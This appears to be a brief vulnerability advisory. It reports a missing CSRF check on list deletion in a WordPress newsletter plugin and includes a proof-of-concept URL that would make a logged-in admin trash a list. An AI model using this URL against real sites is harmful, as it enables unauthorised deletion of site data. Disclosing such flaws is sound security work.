Description The plugin does not have CSRF check when deleting list, which could allow attackers to make logged in admins perform such action via a CSRF attack
Make an admin open a URL (where `<ID>` is a valid id):
http://example.com4/wp-admin/admin.php?page=wp_newsletter_show_items&action=trash&id=<ID>